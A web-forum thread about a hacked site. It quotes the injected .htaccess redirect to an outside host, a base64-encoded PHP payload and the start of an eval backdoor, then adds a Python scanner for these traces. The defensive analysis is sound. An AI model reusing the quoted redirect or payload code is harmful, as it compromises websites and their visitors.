<a fb-href="http://www.facebook.com/album.php?fbid=232326246838563&id=156848747719647&aid=56722" href="pictures&action=list_pics&aid=156848747719647_56722&size=6&name=Oxford Show" title="Taken in Oxford, MS.">
<div class="album">
<img src="http://photos-d.ak.fbcdn.net/hphotos-ak-ash4/390726_232326290171892_2122883596_s.jpg">
</div>
</a>
<div class="name">
<a fb-href="http://www.facebook.com/album.php?fbid=232326246838563&id=156848747719647&aid=56722" href="pictures&action=list_pics&aid=156848747719647_56722&size=6&name=Oxford Show" title="Taken in Oxford, MS.">Oxford Show</a>
</div>
</div>
<script id="logic" language="javascript" src="min/?f=/js/logic/pictures.js" type="text/javascript"></script>
</div>
</div>
</div>
My data is after the script tag and it is nowhere in my code. You can always check this yourself in a console of some kind.
This was caused by a modification to my .htaccess file on my server. I had a local copy so I overwrote it. The file's contents became:
#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://cabaniaseleden.com.ar/stats.php [R=301,L]
</IfModule>
#/c3284d#
RewriteEngine on
RewriteCond %{HTTP_HOST} ^ts\.x10\.mx$ [OR]
RewriteCond %{HTTP_HOST} ^www\.ts\.x10\.mx$
RewriteRule ^/?$ "http\:\/\/75\.66\.61\.141\/" [R=301,L]
The hacker also added this to several PHP files on my site:
#c3284d#
echo(gzinflate(base64_decode("VVHBboMwDL1X4h9yC2hdKDCVbqOVummHnfYB64RCYkokmqSJS9t9/YChavPN9nt+9nPhhVMWN8Gs446UR7Im0ojTATQy4YAjvLUwZCFVteMHoNE8mJE+St1jqQfcIjpVnRDoczArj5+l/gqpd4LOCW0Q7VMcC15xrbiHFiRoJsyBcRd75OiZbSyNRibzeG2BWeMVKjOO55U37W30BDgric3QTVJ7+Ss6LlgZJ8H14pp3as/ROHby4Lb74SSlJVw+6pBmjyLL0uWiXsp8mSeQSg55vVjJZLHKIU1pRO5I8m+vFmocVO8fsjT/Fb5ZdXYKIaSFVB1Rcr2j9hu47HZ0U8R9bTNeeEPvASdXX67vMpzANGLcWtDytVGtDMvjwCni6UE/")));
#/c3284d#
We need to fight internet intrusions like these to try and prevent things like this from happening. It's on every server I access basically. I have no idea how it got there; gotta check the logs.
Yes, I agree. Also, please check for an extra file in your root dir. It can be named anything: c.php, default.php, etc. It has PHP code starting:
if($_GET["rnd"]){die($_GET["rnd"]);}elseif($_POST["e"]){eval(base64_decode(str_rot13......
You can do a site search for it as well. This file was added at the same time as the above .htaccess code was changed.
I tried to trace not the source but the way it was uploaded, and it looks like it was done through FTP. Secure your FTP and, if you run WordPress or Joomla, secure your login page against brute/rainbow attacks, which are quite simple when the user name is known (listed under posts). Does anyone have more details?
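A scanner for the three artefacts described in this thread (paired #xxxxxx# marker comments, a referer-gated external redirect in .htaccess, and PHP that echoes or evals a decoded blob), as an added example that is not part of the original posts. The function names are hypothetical and the sample files are constructed, with a placeholder marker tag, host names and payload.

```python
import os
import re

# "#c3284d# ... #/c3284d#"-style paired markers around an injected block.
MARKER_BLOCK = re.compile(r"^#([0-9a-f]{6})#[ \t]*$.*?^#/\1#[ \t]*$", re.M | re.S)
DECODER = r"(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(\s*"
# eval() of any decoded blob, or echo of a blob that is decoded at least twice.
DECODE_CHAIN = re.compile(
    r"\b(?:eval|assert)\s*\(\s*(?:%s)+|\becho\s*\(?\s*(?:%s){2,}" % (DECODER, DECODER),
    re.I,
)


def line_of(text, offset):
    """1-based line number of a character offset."""
    return text.count("\n", 0, offset) + 1


def referer_redirects(text):
    """Return [(line, target)] for external redirects gated on HTTP_REFERER."""
    hits, gated = [], False
    for number, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        directive = parts[0].lower() if parts else ""
        if directive == "rewritecond":
            gated = gated or (len(parts) > 1 and parts[1].lower() == "%{http_referer}")
        elif directive == "rewriterule":
            target = parts[2].strip('"') if len(parts) > 2 else ""
            flags = parts[3] if len(parts) > 3 else ""
            external = re.match(r"https?://", target, re.I)
            redirect = re.search(r"\bR(?:=\d+)?\b", flags, re.I)
            if gated and external and redirect:
                hits.append((number, target))
            gated = False  # conditions apply only to the next RewriteRule
    return hits


def scan_text(name, text):
    """Return sorted [(line, kind, detail)] findings for one file's content."""
    findings = [(line_of(text, m.start()), "marker-block", "#%s#" % m.group(1))
                for m in MARKER_BLOCK.finditer(text)]
    if os.path.basename(name) == ".htaccess":
        findings += [(n, "referer-redirect", t) for n, t in referer_redirects(text)]
    elif name.endswith(".php"):
        findings += [(line_of(text, m.start()), "decode-chain", m.group(0))
                     for m in DECODE_CHAIN.finditer(text)]
    return sorted(findings)


def scan_tree(root):
    """Scan every .htaccess and .php file under root; return {path: findings}."""
    report = {}
    for folder, _dirs, names in os.walk(root):
        for name in names:
            if name == ".htaccess" or name.endswith(".php"):
                path = os.path.join(folder, name)
                with open(path, encoding="utf-8", errors="replace") as handle:
                    found = scan_text(path, handle.read())
                if found:
                    report[path] = found
    return report


# Constructed samples modelled on the files quoted in the thread; the marker
# tag, host names and payload are placeholders, not values from the page.
SAMPLE_HTACCESS = r"""#a1b2c3#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|bing|yahoo)\.(.*)
RewriteRule ^(.*)$ http://tracker.example.invalid/stats.php [R=301,L]
</IfModule>
#/a1b2c3#
RewriteEngine on
RewriteCond %{HTTP_HOST} ^www\.site\.example$
RewriteRule ^/?$ "http://192.0.2.10/" [R=301,L]
"""
SAMPLE_PHP = """<?php
#a1b2c3#
echo(gzinflate(base64_decode("QUJD")));
#/a1b2c3#
echo "page body";
"""
CLEAN_PHP = '<?php echo base64_decode($row["avatar"]);\n'

if __name__ == "__main__":
    for name, text in ((".htaccess", SAMPLE_HTACCESS), ("index.php", SAMPLE_PHP),
                       ("avatar.php", CLEAN_PHP)):
        print(name, scan_text(name, text))
```

The host-based redirect at the end of the sample .htaccess is not reported, because only redirects conditioned on HTTP_REFERER are treated as the injected pattern; comparing each hit against a known-good copy of the file, as the asker did, confirms it.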
